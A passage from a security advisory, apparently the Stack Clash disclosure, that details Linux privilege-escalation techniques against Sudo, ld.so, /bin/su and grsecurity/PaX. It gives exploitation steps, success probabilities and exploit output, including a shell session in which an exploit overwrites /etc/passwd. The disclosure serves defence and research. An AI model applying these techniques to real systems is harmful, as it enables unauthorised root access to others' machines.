1-(2KB+256B)/4KB. \n\nIn practice, on Debian 8.5, this Sudo exploit:\n\n- gains eip control in 1 run out of 200, on average;\n\n- takes 2.8 seconds per run (on a 4GB Virtual Machine);\n\n- has a good chance of obtaining a root-shell after 200 * 2.8 seconds =\n 9 minutes;\n\n- uses 2GB of memory. \n\nNote: we do not return-into-libc\u0027s system() in Step 4a because /bin/sh\nmay be bash, which drops our escalated root privileges upon execution. \nInstead, we:\n\n- either return-into-libc\u0027s __gconv_find_shlib() function through\n find_module(), which loads this function\u0027s argument from -0x20(%ebp);\n\n- or return-into-libc\u0027s __libc_dlopen_mode() function through\n nss_load_library(), which loads this function\u0027s argument from\n -0x1c(%ebp);\n\n- search the libc for a relative pathname that contains a slash\n character (for example, \"./fork.c\") and pass its address to\n __gconv_find_shlib() or __libc_dlopen_mode();\n\n- symlink() our PIE exploit to this pathname, and let Sudo execute our\n _init() constructor as root, upon successful exploitation. \n\nDebian 8.6\n\nUnlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672: Sudo\u0027s\nPIE and libraries are always randomized, even if we set RLIMIT_STACK to\nRLIM_INFINITY; the probability of successfully returning-into-libc,\nafter gaining eip control in Step 4a (Smash), is 1/256. \n\nHowever, Debian 8.6 is still vulnerable to offset2lib, the minor\nweakness in Linux\u0027s ASLR that coincidentally affects Step 1 (Clash) of\nour stack-clash exploits:\n\n- if we set RLIMIT_STACK to 136MB (MIN_GAP) or less (the default is\n 8MB), then the initial heap-stack distance (between the start of the\n heap and the end of the stack) is minimal, a random variable in the\n [96MB,137MB] range;\n\n- instead of allocating 1GB of heap memory and 1GB of stack memory to\n clash the stack with the heap, we merely allocate 137MB of heap memory\n (directory pathnames from our directory tree \"B\") and no stack memory. \n\nIn theory, on Debian 8.6, the probability of gaining eip control is\n1/134 (instead of 1/148 on Debian 8.5) because the growth of the heap is\nnever blocked by Sudo\u0027s libraries; and in practice, this Sudo exploit\ntakes only 0.15 second per run (instead of 2.8 on Debian 8.5). \n\nIndependent exploitation\n\nThe vulnerability that we discovered in Sudo\u0027s get_process_ttyname()\nfunction for Linux (CVE-2017-1000367) is exploitable independently of\nits stack-clash repercussions: through this vulnerability, a local user\ncan pretend that his tty is any character device on the filesystem, and\nafter two race conditions, he can pretend that his tty is any file on\nthe filesystem. \n\nOn an SELinux-enabled system, if a user is Sudoer for a command that\ndoes not grant him full root privileges, he can overwrite any file on\nthe filesystem (including root-owned files) with this command\u0027s output,\nbecause relabel_tty() (in src/selinux.c) calls open(O_RDWR|O_NONBLOCK)\non his tty and dup2()s it to the command\u0027s stdin, stdout, and stderr. \n\nTo exploit this vulnerability, we:\n\n- create a directory \"/dev/shm/_tmp\" (to work around\n /proc/sys/fs/protected_symlinks), and a symlink \"/dev/shm/_tmp/_tty\"\n to a non-existent pty \"/dev/pts/57\", whose device number is 34873;\n\n- run Sudo through a symlink \"/dev/shm/_tmp/ 34873 \" that spoofs the\n device number of this non-existent pty;\n\n- set the flag CD_RBAC_ENABLED through the command-line option \"-r role\"\n (where \"role\" can be our current role, for example \"unconfined_r\");\n\n- monitor our directory \"/dev/shm/_tmp\" (for an IN_OPEN inotify event)\n and wait until Sudo opendir()s it (because sudo_ttyname_dev() cannot\n find our non-existent pty in \"/dev/pts/\");\n\n- SIGSTOP Sudo, call openpty() until it creates our non-existent pty,\n and SIGCONT Sudo;\n\n- monitor our directory \"/dev/shm/_tmp\" (for an IN_CLOSE_NOWRITE inotify\n event) and wait until Sudo closedir()s it;\n\n- SIGSTOP Sudo, replace the symlink \"/dev/shm/_tmp/_tty\" to our\n now-existent pty with a symlink to the file that we want to overwrite\n (for example \"/etc/passwd\"), and SIGCONT Sudo;\n\n- control the output of the command executed by Sudo (the output that\n overwrites \"/etc/passwd\"):\n\n . either through a command-specific method;\n\n . or through a general method such as \"--\\nHELLO\\nWORLD\\n\" (by\n default, getopt() prints an error message to stderr if it does not\n recognize an option character). \n\nTo reliably win the two SIGSTOP races, we preempt the Sudo process: we\nsetpriority() it to the lowest priority, sched_setscheduler() it to\nSCHED_IDLE, and sched_setaffinity() it to the same CPU as our exploit. \n\n[john@localhost ~]$ head -n 8 /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:/sbin/nologin\ndaemon:x:2:2:daemon:/sbin:/sbin/nologin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\n\n[john@localhost ~]$ sudo -l\n[sudo] password for john:\n... \nUser john may run the following commands on localhost:\n (ALL) /usr/bin/sum\n\n[john@localhost ~]$ ./Linux_sudo_CVE-2017-1000367 /usr/bin/sum $\u0027--\\nHELLO\\nWORLD\\n\u0027\n[sudo] password for john:\n\n[john@localhost ~]$ head -n 8 /etc/passwd\n/usr/bin/sum: unrecognized option \u0027--\nHELLO\nWORLD\n\u0027\nTry \u0027/usr/bin/sum --help\u0027 for more information. \nogin\nadm:x:3:4:adm:/var/adm:/sbin/nologin\nlp:x:4:7:lp:/var/spool/lpd:/sbin/nologin\n\n========================================================================\nIV.1.3. ld.so \"hwcap\" exploit\n========================================================================\n\n\"ld.so and ld-linux.so* find and load the shared libraries needed by a\nprogram, prepare the program to run, and then run it.\" (man ld.so)\n\nThrough ld.so, most SUID and SGID binaries on most i386 Linux\ndistributions are exploitable. For example: Debian 7, 8, 9, 10; Fedora\n23, 24, 25; CentOS 5, 6, 7. \n\nDebian 8.5\n\nStep 1: Clash the stack with anonymous mmap()s\n\nThe minimal malloc() implementation in ld.so calls mmap(), not brk(), to\nobtain memory from the system, and it never calls munmap(). To reach the\nstart of the stack with anonymous mmap()s, we:\n\n- set RLIMIT_STACK to RLIM_INFINITY and switch from the default top-down\n mmap() layout to the legacy bottom-up mmap() layout;\n\n- cover half of the initial mmap-stack distance\n (0xC0000000-0x40000000=2GB) with 1GB of stack memory (the maximum\n permitted by the kernel\u0027s 1/4 limit on the argument and environment\n strings);\n\n- cover the other half of this distance with 1GB of anonymous mmap()s,\n through multiple LD_AUDIT environment variables that permanently leak\n millions of audit_list structures (CVE-2017-1000366) in\n process_envvars() and process_dl_audit() (elf/rtld.c). \n\nStep 2: Move the stack-pointer to the start of the stack\n\nTo consume the 128KB of initial stack expansion, we simply pass 128KB of\nargv[] and envp[] pointers to execve(), as explained in II.3.2. \n\nStep 3: Jump over the stack guard-page and into the anonymous mmap()s\n\n_dl_init_paths() (elf/dl-load.c), which is called by dl_main() after\nprocess_envvars(), alloca()tes llp_tmp, a stack-based buffer large\nenough to hold the LD_LIBRARY_PATH environment variable and any\ncombination of Dynamic String Token (DST) replacement strings. To\ncalculate the size of llp_tmp, _dl_init_paths() must:\n\n- first, scan LD_LIBRARY_PATH and count all DSTs ($LIB, $PLATFORM, and\n $ORIGIN);\n\n- second, multiply the number of DSTs by the length of the longest DST\n replacement string (on Debian, $LIB is replaced by the 18-char-long\n \"lib/i386-linux-gnu\", $PLATFORM by \"i386\" or \"i686\", and $ORIGIN by\n the pathname of the program\u0027s directory, for example \"/bin\" or\n \"/usr/sbin\" -- the longest DST replacement string is usually\n \"lib/i386-linux-gnu\");\n\n- last, add the length of the original LD_LIBRARY_PATH. \n\nConsequently, if LD_LIBRARY_PATH contains many DSTs that are replaced by\nthe shortest DST replacement string, then llp_tmp is large but not fully\nwritten to, and can be used to jump over the stack guard-page and into\nthe anonymous mmap()s. \n\nOur ld.so exploits do not use $ORIGIN because it is ignored by several\ndistributions and glibc versions; for example:\n\n2010-12-09 Andreas Schwab \u003cschwab@redhat.com\u003e\n\n * elf/dl-object.c (_dl_new_object): Ignore origin of privileged\n program. \n\nIndex: glibc-2.12-2-gc4ccff1/elf/dl-object.c\n===================================================================\n--- glibc-2.12-2-gc4ccff1.orig/elf/dl-object.c\n+++ glibc-2.12-2-gc4ccff1/elf/dl-object.c\n@@ -214,6 +214,9 @@ _dl_new_object (char *realname, const ch\n out:\n new-\u003el_origin = origin;\n }\n+ else if (INTUSE(__libc_enable_secure) \u0026\u0026 type == lt_executable)\n+ /* The origin of a privileged program cannot be trusted. */\n+ new-\u003el_origin = (char *) -1;\n\n return new;\n }\n\nStep 4b: Smash an anonymous mmap() with the stack\n\nBefore _dl_init_paths() returns to dl_main() and jumps back from the\nanonymous mmap()s into the stack, we overwrite the block of mmap()ed\nmemory malloc()ated by _dl_important_hwcaps() with the contents of the\nstack-based buffer llp_tmp. \n\n- The block of memory malloc()ated by _dl_important_hwcaps() is divided\n in two:\n\n . The first part (the \"hwcap-pointers\") is an array of r_strlenpair\n structures that point to the hardware-capability strings stored in\n the second part of this memory block. The second part (the \"hwcap-strings\") contains strings of\n hardware-capabilities that are appended to the pathnames of trusted\n directories, such as \"/lib/\" and \"/lib/i386-linux-gnu/\", when\n open_path() searches for audit libraries (LD_AUDIT), preload\n libraries (LD_PRELOAD), or dependent libraries (DT_NEEDED). \n\n For example, on Debian, when open_path() finds \"libc.so.6\" in\n \"/lib/i386-linux-gnu/i686/cmov/\", \"i686/cmov/\" is such a\n hardware-capability string. \n\n- To overwrite the block of memory malloc()ated by\n _dl_important_hwcaps() with the contents of the stack-based buffer\n llp_tmp, we divide our LD_LIBRARY_PATH environment variable in two:\n\n . The first, static part (our \"good-write\") overwrites the first\n hardware-capability string with characters that we do control. The second, dynamic part (our \"bad-write\") overwrites the last\n hardware-capability strings with characters that we do not control\n (the short DST replacement strings that enlarge llp_tmp and allow us\n to jump over the stack guard-page). \n\nIf our 16-byte-aligned good-write overwrites the 8-byte-aligned first\nhardware-capability string with the 8-byte pattern \"/../tmp/\", and if we\nappend the trusted directory \"/lib\" to our LD_LIBRARY_PATH, then (after\n_dl_init_paths() returns to dl_main()):\n\n- dlmopen_doit() tries to load an LD_AUDIT library \"a\" (our memory leak\n from Step 1);\n\n- _dl_map_object() searches for \"a\" in the trusted directory \"/lib\" from\n our LD_LIBRARY_PATH;\n\n- open_path() finds our library \"a\" in \"/lib//../tmp//../tmp//../tmp/\"\n because we overwrote the first hardware-capability string with the\n pattern \"/../tmp/\";\n\n- dl_open_worker() executes our library\u0027s _init() constructor, as root. \n\nIn theory, this exploit\u0027s probability of success depends on:\n\n- (event A) the size of rtld_search_dirs.dirs[0], an array of\n r_search_path_elem structures that are malloc()ated by\n _dl_init_paths() after the _dl_important_hwcaps(), and must be\n allocated above the stack (below 0xC0000000), not below the stack\n where it would interfere with Steps 3 (Jump) and 4b (Smash):\n\nP(A) = 1 - size of rtld_search_dirs.dirs[0] / max stack randomization\n\n- (event B) the size of the hwcap-pointers and the size of our\n good-write, which must overwrite the first hardware-capability string,\n but not the first hardware-capability pointer (to this string):\n\nP(B|A) = MIN(size of hwcap-pointers, size of good-write) /\n (max stack randomization - size of rtld_search_dirs.dirs[0])\n\n- (event C) the size of the hwcap-strings and the size of our bad-write,\n which must not write past the end of hwcap-strings; but we guarantee\n that size of hwcap-strings \u003e= size of good-write + size of bad-write:\n\nP(C|B) = 1\n\nIn practice, we use the LD_HWCAP_MASK environment variable to maximize\nthis exploit\u0027s probability of success, because:\n\n- the size of the hwcap-pointers -- which act as a cushion that absorbs\n the excess of good-write without crashing,\n\n- the size of the hwcap-strings -- which act as a cushion that absorbs\n the excess of good-write and bad-write without crashing,\n\n- and the size of rtld_search_dirs.dirs[0],\n\nare all proportional to 2^N, where N is the number of supported\nhardware-capabilities that we enable in LD_HWCAP_MASK. \n\nFor example, on Debian 8.5, this exploit:\n\n- has a 1/151 probability of success;\n\n- takes 5.5 seconds per run (on a 4GB Virtual Machine);\n\n- has a good chance of obtaining a root-shell after 151 * 5.5 seconds =\n 14 minutes. \n\nDebian 8.6\n\nUnlike Debian 8.5, Debian 8.6 is not vulnerable to CVE-2016-3672, but\nour ld.so \"hwcap\" exploit is a data-only attack and is not affected by\nthe ASLR of the libraries and PIEs. \n\nDebian 9 and 10\n\nUnlike Debian 8, Debian 9 and 10 are not vulnerable to offset2lib: if we\nset RLIMIT_STACK to RLIM_INFINITY, the libraries are randomized above\nthe address 0x40000000, but the PIE is randomized above 0x80000000\n(instead of 0x40000000 before the offset2lib patch). \n\nUnfortunately, we discovered a vulnerability in the offset2lib patch\n(CVE-2017-1000370): if the PIE is execve()d with 1GB of argument or\nenvironment strings (the maximum permitted by the kernel\u0027s 1/4 limit)\nthen the stack occupies the address 0x80000000, and the PIE is mapped\nabove the address 0x40000000 instead, directly below the libraries. \nThis vulnerability effectively nullifies the offset2lib patch, and\nallows us to reuse our Debian 8 exploit against Debian 9 and 10. \n\n$ ./Linux_offset2lib\nRun #1... \nCVE-2017-1000370 triggered\n40076000-40078000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib\n40078000-40079000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib\n40079000-4009b000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib\n4009b000-400c0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so\n400c0000-400c1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so\n400c1000-400c2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so\n400c2000-400c4000 r--p 00000000 00:00 0 [vvar]\n400c4000-400c6000 r-xp 00000000 00:00 0 [vdso]\n400c6000-400c8000 rw-p 00000000 00:00 0\n400cf000-402a3000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so\n402a3000-402a4000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so\n402a4000-402a6000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so\n402a6000-402a7000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so\n402a7000-402aa000 rw-p 00000000 00:00 0\n7fcf1000-bfcf2000 rw-p 00000000 00:00 0 [stack]\n\nCaveats\n\n- On Fedora and CentOS, this ld.so \"hwcap\" exploit fails against\n /usr/bin/passwd and /usr/bin/chage (but it works against all other\n SUID-root binaries) because of SELinux:\n\ntype=AVC msg=audit(1492091008.983:414): avc: denied { execute } for pid=2169 comm=\"passwd\" path=\"/var/tmp/a\" dev=\"dm-0\" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0\n\ntype=AVC msg=audit(1492092997.581:487): avc: denied { execute } for pid=2648 comm=\"chage\" path=\"/var/tmp/a\" dev=\"dm-0\" ino=12828063 scontext=unconfined_u:unconfined_r:passwd_t:s0-s0:c0.c1023 tcontext=unconfined_u:object_r:user_tmp_t:s0 tclass=file permissive=0\n\n- It fails against recent versions of Sudo that specify an RPATH such as\n \"/usr/lib/sudo\": _dl_map_object() first searches for our LD_AUDIT\n library in RPATH, but open_path() fails to find our library in\n \"/usr/lib/sudo//../tmp/\" and crashes as soon as it reaches an\n overwritten hwcap-pointer. \n\n This problem can be solved by a 16-byte pattern \"///../../../tmp/\"\n (instead of the 8-byte pattern \"/../tmp/\") but the exploit\u0027s\n probability of success would be divided by two. \n\n- On Ubuntu, this ld.so \"hwcap\" exploit always fails, because of the\n following patch:\n\nDescription: pro-actively disable LD_AUDIT for setuid binaries, regardless\n of where the libraries are loaded from. This is to try to make sure that\n CVE-2010-3856 cannot sneak back in. Upstream is unlikely to take this,\n since it limits the functionality of LD_AUDIT. \nAuthor: Kees Cook \u003ckees@ubuntu.com\u003e\n\nIndex: eglibc-2.15/elf/rtld.c\n===================================================================\n--- eglibc-2.15.orig/elf/rtld.c 2012-05-09 10:05:29.456899131 -0700\n+++ eglibc-2.15/elf/rtld.c 2012-05-09 10:38:53.952009069 -0700\n@@ -2529,7 +2529,7 @@\n while ((p = (strsep) (\u0026str, \":\")) != NULL)\n if (p[0] != \u0027\\0\u0027\n \u0026\u0026 (__builtin_expect (! __libc_enable_secure, 1)\n- || strchr (p, \u0027/\u0027) == NULL))\n+ ))\n {\n /* This is using the local malloc, not the system malloc. The\n memory can never be freed. */\n\n========================================================================\nIV.1.4. ld.so \".dynamic\" exploit\n========================================================================\n\nTo exploit ld.so without the LD_AUDIT memory leak, we rely on a second\nvulnerability that we discovered in the offset2lib patch\n(CVE-2017-1000371):\n\nif we set RLIMIT_STACK to RLIM_INFINITY, and allocate nearly 1GB of\nstack memory (the maximum permitted by the kernel\u0027s 1/4 limit on the\nargument and environment strings) then the stack grows down to almost\n0x80000000, and because the PIE is mapped above 0x80000000, the minimum\ndistance between the end of the PIE\u0027s read-write segment and the start\nof the stack is 4KB (the stack guard-page). \n\n$ ./Linux_offset2lib 0x3f800000\nRun #1... \nRun #2... \nRun #3... \nRun #796... \nRun #797... \nRun #798... \nCVE-2017-1000371 triggered\n4007b000-400a0000 r-xp 00000000 fd:00 8463588 /usr/lib/ld-2.24.so\n400a0000-400a1000 r--p 00024000 fd:00 8463588 /usr/lib/ld-2.24.so\n400a1000-400a2000 rw-p 00025000 fd:00 8463588 /usr/lib/ld-2.24.so\n400a2000-400a4000 r--p 00000000 00:00 0 [vvar]\n400a4000-400a6000 r-xp 00000000 00:00 0 [vdso]\n400a6000-400a8000 rw-p 00000000 00:00 0\n400af000-40283000 r-xp 00000000 fd:00 8463595 /usr/lib/libc-2.24.so\n40283000-40284000 ---p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so\n40284000-40286000 r--p 001d4000 fd:00 8463595 /usr/lib/libc-2.24.so\n40286000-40287000 rw-p 001d6000 fd:00 8463595 /usr/lib/libc-2.24.so\n40287000-4028a000 rw-p 00000000 00:00 0\n8000a000-8000c000 r-xp 00000000 00:26 25041 /tmp/Linux_offset2lib\n8000c000-8000d000 r--p 00001000 00:26 25041 /tmp/Linux_offset2lib\n8000d000-8002f000 rw-p 00002000 00:26 25041 /tmp/Linux_offset2lib\n80030000-bf831000 rw-p 00000000 00:00 0 [heap]\n\nNote: in this example, the \"[stack]\" is incorrectly displayed as the\n\"[heap]\" by show_map_vma() (in fs/proc/task_mmu.c). \n\nThis completes Step 1: we clash the stack with the PIE\u0027s read-write\nsegment; we complete the remaining steps as in the \"hwcap\" exploit:\n\n- Step 2: we consume the initial stack expansion with 128KB of argv[]\n and envp[] pointers;\n\n- Step 3: we jump over the stack guard-page and into the PIE\u0027s\n read-write segment with llp_tmp\u0027s alloca() (in _dl_init_paths());\n\n- Step 4b: we smash the PIE\u0027s read-write segment with llp_tmp\u0027s\n good-write and bad-write (in _dl_init_paths()); we can smash the\n following sections:\n\n + .data and .bss: but we discarded this application-specific approach;\n\n + .got: although protected by Full RELRO (Full RELocate Read-Only,\n GNU_RELRO and BIND_NOW) the .got is still writable when we smash it\n in _dl_init_paths(); however, within ld.so, the .got is written to\n but never read from, and we therefore discarded this approach;\n\n + .dynamic: our favored approach. \n\nOn i386, the .dynamic section is an array of Elf32_Dyn structures (an\nint32 d_tag, and the union of uint32 d_val and uint32 d_ptr) that\ncontains entries such as:\n\n- DT_STRTAB, a pointer to the PIE\u0027s .dynstr section (a read-only string\n table): its d_tag (DT_STRTAB) is read (by elf_get_dynamic_info())\n before we smash it in _dl_init_paths(), but its d_ptr is read (by\n _dl_map_object_deps()) after we smash it in _dl_init_paths();\n\n- DT_NEEDED, an offset into the .dynstr section: the pathname of a\n dependent library that must be loaded by _dl_map_object_deps(). \n\nIf we overwrite the entire .dynamic section with the following 8-byte\npattern (an Elf32_Dyn structure):\n\n- a DT_NEEDED d_tag,\n\n- a d_val equal to half the address of our own string table on the stack\n (16MB of argument strings, enough to defeat the 8MB stack\n randomization),\n\nthen _dl_map_object_deps() reads the pathname of this dependent library\nfrom DT_STRTAB.d_ptr + DT_NEEDED.d_val = our_strtab/2 + our_strtab/2 =\nour_strtab, and loads our own library, as root. This 8-byte pattern is\nsimple, but poses two problems:\n\n- DT_NEEDED is an int32 equal to 1, but we smash the .dynamic section\n with a string copy that cannot contain null-bytes: to solve this first\n problem we use DT_AUXILIARY instead, which is equivalent but equal to\n 0x7ffffffd;\n\n- ld.so crashes before it returns from dl_main() (before it calls\n _dl_init() and executes our library\u0027s _init() constructor):\n\n . in _dl_map_object_deps() because of our DT_AUXILIARY entry;\n\n . in version_check_doit() because we overwrote the DT_VERNEED entry;\n\n . in _dl_relocate_object() because we overwrote the DT_REL, DT_RELSZ,\n and DT_RELCOUNT entries. \n\nTo solve this second problem, we could overwrite the .dynamic section\nwith a more complicated pattern that repairs these entries, but our\nexploit\u0027s probability of success would decrease significantly. \n\nInstead, we take control of ld.so\u0027s execution flow as soon as\n_dl_map_object_deps() loads our library:\n\n- our library contains three executable LOAD segments,\n\n- but only the first and last segments are sanity-checked by\n _dl_map_object_from_fd() and _dl_map_segments(),\n\n- and all segments except the first are mmap()ed with MAP_FIXED by\n _dl_map_segments(),\n\n- so we can mmap() our second segment anywhere -- we mmap() it on top of\n ld.so\u0027s executable segment,\n\n- and return into our own code (instead of ld.so\u0027s) as soon as this\n second mmap() system-call returns. \n\nProbabilities\n\nThe \"hwcap\" exploit taught us that this \".dynamic\" exploit\u0027s probability\nof success depends on:\n\n- the size of the cushion below the .dynamic section, which can absorb\n the excess of \"good-write\" without crashing: the padding bytes between\n the start of the PIE\u0027s read-write segment and the start of its first\n read-write section;\n\n- the size of the cushion above the .dynamic section, which can absorb\n the excess of \"good-write\" and \"bad-write\" without crashing: the .got,\n .data, and .bss sections. \n\nIf we guarantee that (cushion above .dynamic \u003e good-write + bad-write),\nthen the theoretical probability of success is approximately:\n\nMIN(cushion below .dynamic, good-write) / max stack randomization\n\nThe maximum size of the cushion below the .dynamic section is 4KB (one\npage) and hence the maximum probability of success is 4KB/8MB=1/2048. \nIn practice, on Ubuntu 16.04.2:\n\n- the highest probability is 1/2589 (/bin/su) and the lowest probability\n is 1/9225 (/usr/lib/eject/dmcrypt-get-device);\n\n- each run uses 1GB of memory and takes 1.5 seconds (on a 4GB Virtual\n Machine);\n\n- this ld.so \".dynamic\" exploit has a good chance of obtaining a\n root-shell after 2589 * 1.5 seconds ~= 1 hour. \n\n========================================================================\nIV.1.5. /bin/su\n========================================================================\n\nAs we were drafting this advisory, we discovered a general method for\ncompleting Step 1 (Clash) of the stack-clash exploitation: the Linux\nkernel limits the size of the command-line arguments and environment\nvariables to 1/4 of the RLIMIT_STACK, but it imposes this limit on the\nargument and environment strings, not on the argv[] and envp[] pointers\nto these strings (CVE-2017-1000365). \n\nOn i386, if we set RLIMIT_STACK to RLIM_INFINITY, the maximum number of\nargv[] and envp[] pointers is 1G (1/4 of the RLIMIT_STACK, divided by\n1B, the minimum size of an argument or environment string). In theory,\nthe maximum size of the initial stack is therefore 1G*(1B+4B)=5GB. In\npractice, this would exhaust the address-space and allows us to clash\nthe stack with the memory region that is mapped below, without an\napplication-specific memory leak. \n\nThis discovery allowed us to write alternative versions of our\nstack-clash exploits; for example:\n\n- an ld.so \"hwcap\" exploit against Ubuntu: we replace the LD_AUDIT\n memory leak with 2GB of stack memory (1GB of argument and environment\n strings, and 1GB of argv[] and envp[] pointers) and replace the\n LD_AUDIT library with an LD_PRELOAD library;\n\n- an ld.so \".dynamic\" exploit against systems vulnerable to offset2lib:\n we reach the end of the PIE\u0027s read-write segment with only 128MB of\n stack memory (argument and environment strings and pointers). \n\nThese proofs-of-concept demonstrate a general method for completing Step\n1 (Clash), but they are much slower than their original versions (10-20\nseconds per run) because they pass millions of argv[] and envp[]\npointers to execve(). \n\nMoreover, this discovery allowed us to exploit SUID binaries through\ngeneral methods that do not depend on application-specific or ld.so\nvulnerabilities; if a SUID binary calls setlocale(LC_ALL, \"\"); and\ngettext() (or a derivative such as strerror() or _()), then it is\nexploitable:\n\n- Step 1: we clash the stack with the heap through millions of argument\n and environment strings and pointers;\n\n- Step 2: we consume the initial stack expansion with 128KB of argument\n and environment pointers;\n\n- Step 3: we jump over the stack guard-page and into the heap with the\n alloca()tion of the LANGUAGE environment variable in gettext();\n\n- Step 4a: we smash the stack with the malloc()ation of the\n OUTPUT_CHARSET environment variable in gettext() and thus gain control\n of eip. \n\nFor example, we exploited Debian\u0027s /bin/su (from the shadow-utils): its\nmain() function calls setlocale() and save_caller_context(), which calls\ngettext() (through _()) if its stdin is not a tty. \n\nDebian 8.5\n\nDebian 8.5 is vulnerable to CVE-2016-3672: we set RLIMIT_STACK to\nRLIM_INFINITY and disable ASLR, clash the stack with the heap through\n2GB of argument and environment strings and pointers (1GB of strings,\n1GB of pointers), and return-into-libc\u0027s system() or __libc_dlopen():\n\n- the system() version uses 4GB of memory (2GB in the /bin/su process,\n and 2GB in the process fork()ed by system());\n\n- the __libc_dlopen() version uses only 2GB of memory, but ebp must\n point to our smashed data on the stack. \n\nDebian 8.6\n\nDebian 8.6 is vulnerable to offset2lib but not to CVE-2016-3672: we must\nbrute-force the libc\u0027s ASLR (8 bits of entropy), but we clash the stack\nwith the heap through only 128MB of argument and environment strings and\npointers -- this /bin/su exploit can be parallelized. \n\n========================================================================\nIV.1.6. Grsecurity/PaX\n========================================================================\n\nhttps://grsecurity.net/\n\nIn 2010, grsecurity/PaX introduced a configurable stack guard-page: its\nsize can be modified through /proc/sys/vm/heap_stack_gap and is 64KB by\ndefault (unlike the hard-coded 4KB stack guard-page in the vanilla\nkernel). \n\nUnfortunately, a 64KB stack guard-page is not large enough, and can be\njumped over with ld.so or gettext() (CVE-2017-1000377); for example, we\nwere able to gain eip control against Sudo, but we were unable to obtain\na root-shell or gain eip control against another application, because\ngrsecurity/PaX imposes the following security measures:\n\n- it restricts the RLIMIT_STACK of SUID binaries to 8MB, which prevents\n us from switching to the legacy bottom-up mmap() layout (Step 1);\n\n- it restricts the argument and environment strings to 512KB, which\n prevents us from clashing the stack through megabytes of command-line\n arguments and environment variables (Step 1);\n\n- it randomizes the PIE and libraries with 16 bits of entropy (instead\n of 8 bits in vanilla), which prevents us from brute-forcing the ASLR\n and returning-into-libc (Step 4a);\n\n- it implements /proc/sys/kernel/grsecurity/deter_bruteforce (enabled by\n default), which limits the number of SUID crashes to 1 every 15\n minutes (all Steps) and makes exploitation impossible. \n\nSudo\n\nThe vulnerability that we discovered in Sudo\u0027s get_process_ttyname()\n(CVE-2017-1000367) allows us to:\n\n- Step 1: clash the stack with 3GB of heap memory from the filesystem\n (directory pathnames) and bypass grsecurity/PaX\u0027s 512KB limit on the\n argument and environment strings;\n\n- Step 2: consume the 128KB of initial stack expansion with 3MB of\n recursive function calls and avoid grsecurity/PaX\u0027s 8MB restriction on\n the RLIMIT_STACK;\n\n- Step 3: jump over grsecurity/PaX\u0027s 64KB stack guard-page with a 128KB\n (MAX_ARG_STRLEN) alloca()tion of the LANGUAGE environment variable in\n gettext();\n\n- Step 4a: smash the stack with a 128KB (MAX_ARG_STRLEN) malloc()ation\n of the OUTPUT_CHARSET environment variable in gettext() -- the\n \"smashing-chunk\" -- and thus gain control of eip. \n\nIn Step 1, we nearly exhaust the address-space until finally malloc()\nswitches from brk() to 1MB mmap()s and reaches the start of the stack\nwith the very last 1MB mmap() that we allocate. The exact amount of\nmemory that we must allocate to reach the stack with our last 1MB mmap()\ndepends on the sum of three random variables: the 256MB randomization of\nthe stack, the 64MB randomization of the heap, and the 1MB randomization\nof the NULL region. \n\nTo maximize the probability of jumping over the stack guard-page, into\nour last 1MB mmap() below the stack, and overwriting a return-address on\nthe stack with our smashing-chunk:\n\n- (Step 1) we must allocate the mean amount of memory to reach the stack\n with our last 1MB mmap(): the sum of three uniform random variables is\n not uniform (https://en.wikipedia.org/wiki/Irwin-Hall_distribution),\n but the values within the 256MB-64MB-1MB=191MB plateau at the center\n of this bell-shaped probability distribution occur with a uniform and\n maximum probability of (1MB*64MB)/(1MB*64MB*256MB)=1/256MB;\n\n- (Step 1) the end of our last 1MB mmap() must be allocated at a\n distance within [stack guard-page (64KB), guard-page jump (128KB)]\n below the start of the stack: the guard-page jump (Step 3) then lands\n at a distance d within [0, guard-page jump - stack guard-page (64KB)]\n below the end of our last 1MB mmap();\n\n- (Step 4a) the end of our smashing-chunk must be allocated at the end\n of our last 1MB mmap(), above the landing-point of the guard-page\n jump: our smashing-chunk then overwrites a return-address on the\n stack, below the landing-point of the guard-page jump. \n\nIn theory, this probability is roughly:\n\nSUM(d = 1; d \u003c guard-page jump - stack guard-page; d++) d / (256MB*1MB)\n\n ~= ((guard-page jump - stack guard-page)^2 / 2) / (256MB*1MB)\n\n ~= 1 / 2^17\n\nIn practice, we tested this Sudo proof-of-concept on an i386 Debian 8.6\nprotected by the linux-grsec package from the jessie-backports, but we\nmanually disabled /proc/sys/kernel/grsecurity/deter_bruteforce:\n\n- it uses 3GB of memory, and 800K on-disk inodes;\n\n- it takes 5.5 seconds per run (on a 4GB Virtual Machine);\n\n- it has a good chance of gaining eip control after 2^17 * 5.5 seconds =\n 200 hours; in our test:\n\nPAX: From 192.168.56.1: execution attempt in: \u003cheap\u003e, 1b068000-a100d000 1b068000\nPAX: terminating task: /usr/bin/sudo( 1 ):25465, uid/euid: 1000/0, PC: 41414141, SP: b8844f30\nPAX: bytes at PC: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41\nPAX: bytes at SP-4: 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141\n\nHowever, brute-forcing the ASLR to obtain a root-shell would take ~1500\nyears and makes exploitation impossible. \n\nMoreover, if we enable /proc/sys/kernel/grsecurity/deter_bruteforce,\ngaining eip control would take ~1365 days, and obtaining a root-shell\nwould take thousands of years. \n\n========================================================================\nIV.1.7. 64-bit exploitation\n========================================================================\n\nIntroduction\n\nThe address-space of a 64-bit process is so vast 